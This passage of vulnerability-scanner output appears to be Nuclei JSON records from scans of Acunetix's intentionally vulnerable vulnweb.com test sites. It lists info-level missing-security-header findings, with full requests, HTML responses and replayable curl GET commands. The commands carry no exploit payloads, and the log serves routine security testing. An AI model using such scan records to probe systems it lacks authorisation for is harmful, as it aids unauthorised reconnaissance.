d\\ufffdl\\ufffd\\u0008\\u0015`\\u0002\\u0000\\ufffdx\\u0007\\ufffd8\\ufffd{\\u003c\\ufffd\\u0007\\u0006\\ufffd\\u0015\\ufffd\\ufffd\\ufffdZD\\ufffd\\u0002Á\\ufffdZ\\ufffdYv\\ufffd3X\\ufffdx\\ufffd]\\ufffd\\u000b9:v\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\u001fo\\ufffd\\ufffd*\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl'\\ufffd\\ufffd\\ufffd\\u0015d\\ufffd)\\ufffdXC\\ufffd\\ufffd\\ufffd\\ufffdA?\\ufffd[\\ufffd;\\u001e0̆\\ufffd\\u0006\\ufffd\\ufffd\\ufffd{$\\ufffd:\\u0011~E\\ufffd\\u001eˌE_\\ufffd:\\ufffdcd\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd@\\t x\\u001f\\ufffdZX\\ufffd0\\ufffd\\ufffd\\ufffdr\\u0008\\ufffd\\u000b\\u0026\\ufffdX5q\\ufffd\\ufffdW\\ufffd\\ufffd\\u00114!Ķ(\\u000b\\ufffdP\\ufffd\\u0015\\ufffd\\u0000!`\\ufffd\\u000cQP\\ufffd\\ufffd\\u0016]\\ufffd\\ufffd\\ufffdS@(n\\ufffd\\u0015\\u003c\\ufffd?sB\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd=\\u001e,\\ufffd\\u0026\\ufffd63\\ufffd\\ufffd׿mO\\ufffdȅ\\t \\u0000I\\ufffdC\\u001c\\ufffd\\ufffd\\u0010\\ufffdɽ\\ufffdŀ꠆\\ufffdu\\u0004\\u001a\\ufffd#\\ufffd\\ufffd|\\ufffd`j\\ufffd\\ufffdT\\ufffd\\u0014h\\ufffd1=\\ufffd\\u0004W ݃\\ufffd\\u0026󷦱\\ufffdfU\\u0014\\u000b\\ufffd\\ufffd#\\ufffdO'\\ufffd\\ufffd\\u0000F\\ufffd\\u003ey\\ufffd\\u0013\\ufffd1\\ufffd\\ufffd\\ufffd|\\ufffd\\u0026U\\u0004\\ufffd`,{\\ufffd\\n8\\u0000\\ufffdg\\ufffd$\\ufffd\\ufffd\\ufffdN\\ufffd!sjň\\u00062\\ufffd]\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000Uu\\ufffds\\ufffd\\ufffd\\ufffd\\ufffds\\ufffd`t%\\ufffdT\\ufffd\\u001bzr\\ufffd\\ufffd\\ufffd\\u001bd$h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\ufffd鿱Q\\ufffd\\ufffdZ2\\ufffd\\ufffdJ\\ufffdE3\\ufffd\\u0000.\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\njd3\\u0015\\ufffdL\\ufffd\\ufffdR\\ufffdE\\ufffd\\ufffdd\\ufffd\\u001cw\\u003cp:_$N҅\\ufffdNc\\u0006\\ufffd\\ufffd\\nO\\ufffd\\ufffd\\ufffdT\\ufffd5\\u0008\\ufffdG#iF\\ufffd\\u0011?.\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdY\\ufffdy\\u001c\\ufffd̞h*gf\\u0014\\ufffd3-\\ufffdN\\ufffd\\ufffd#B;\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdb\\u00074t\\ufffdE\\ufffdP\\ufffdʦ3 \\ufffd\\ufffdv\\ufffd\\ufffdH\\u0004\\u000b\\ufffd\\u0016y=,\\ufffd\\ufffd\\ufffd\\u0014\\ufffd\\\"x\\ufffd\\u0002\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0005J\\ufffd\\u003c\\ufffd$\\ufffd\\u0004U^Dح\\ufffdכ\\u001dc\\ufffdc\\u001aK\\ufffd\\ufffdK_\\ufffd\\ufffd\\ufffd9^\\u0018\\ufffdW\\ufffdaZ\\ufffd]\\ufffd\\ufffdԶ’\\u0002\\ufffdT\\ufffd\\u0006(y\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\ufffd9c\\u001c\\u003c\\ufffd\\u0014\\ufffd\\ufffd\\ufffd,\\ufffdt\\ufffd\\ufffdY\\ufffd\\ufffd_o\\u0019\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd7\\ufffd\\ufffdb\\ufffdT\\ufffd\\ufffdcma\\ufffd\\ufffdq\\ufffdY\\ufffd^\\u0017\\ufffd\\ufffdN#V+\\ufffdq\\ufffd.\\ufffdC\\\"\\ufffd\\ufffd\\ufffdL\\u0008\\ufffdM\\ufffd\\ufffd:\\u0002~\\ufffdk\\ufffd|\\ufffd}\\ufffdxA\\ufffd*\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\ufffdY\\u00022\\ufffd*\\ufffd\\u0004\\n6\\ufffd\\ufffd\\u0001\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\u000e+\\ufffdI\\u001e\\ufffdT\\u0004\\u0006\\ufffd*\\ufffdt\\ufffd/8Xb\\ufffd\\ufffd\\u000c\\ufffdakr\\ufffd\\ufffdV4\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdCvp\\ufffd\\ufffd.W\\ufffd\\u0008\\u001a\\u0000\\ufffd\\r\\ufffd\\ufffd5F\\u0016\\ufffd7F\\ufffdo[\\ufffd\\u001d\\ufffd#\\ufffd\\ufffdw}1\\ufffd\\ufffdn\\u0010MHٛ\\ufffd\\ufffd\\ufffdk\\ufffd\\ufffdL\\ufffd,\\u0000Z\\ufffd\\ufffd\\u0005\\u0014Esȫ\\u0007\\ufffd:x\\ufffdk\\ufffdU\\ufffd\\ufffdh\\ufffd~ߘ\\ufffd\\ufffd\\ufffd^*\\ufffd\\ufffd\\u0019\\ufffd\\ufffd8X\\ufffd\\ufffd\\ufffd|x4L:\\ufffdGa\\ufffd\\ufffd\\ufffd\\ufffd]Z\\ufffd\\u001b,jC9\\ufffd!\\ufffd\\u001e\\u0008\\ufffd\\ufffd\\ufffd\\ufffdŞVaL\\ufffd\\ufffd\\ufffdQg9~p\\u000c\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\u0019\\ufffd\\u001a\\ufffd\\ufffdl\\ufffdp\\ufffd\\u0018\\ufffd\\u0000Q\\ufffd\\u000c1'F\\u0018a\\ufffd$g\\u0018\\ufffd\\u0018c\\u0014\\ufffdu\\u001d\\ufffd\\ufffdo\\ufffd\\u0018bR\\ufffd\\ufffd\\ufffd\\u0018`\\ufffdF\\u0018a\\ufffd$a\\ufffd\\u0018\\ufffdFr\\ufffd\\u0018bF\\ufffda\\ufffd\\u0018(\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:35.360220801Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"www.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://www.vulnweb.com\",\"matched-at\":\"http://www.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: www.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:35.862204595Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"http://vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:35.862264979Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests\",\"path\":\"/wvstests\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/\",\"request\":\"GET /wvstests HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:27 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"pmwiki_2_1_19/\\\"\\u003epmwiki_2_1_19/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:36.11630369Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19\",\"path\":\"/wvstests/pmwiki_2_1_19\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/\",\"request\":\"GET /wvstests/pmwiki_2_1_19 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca 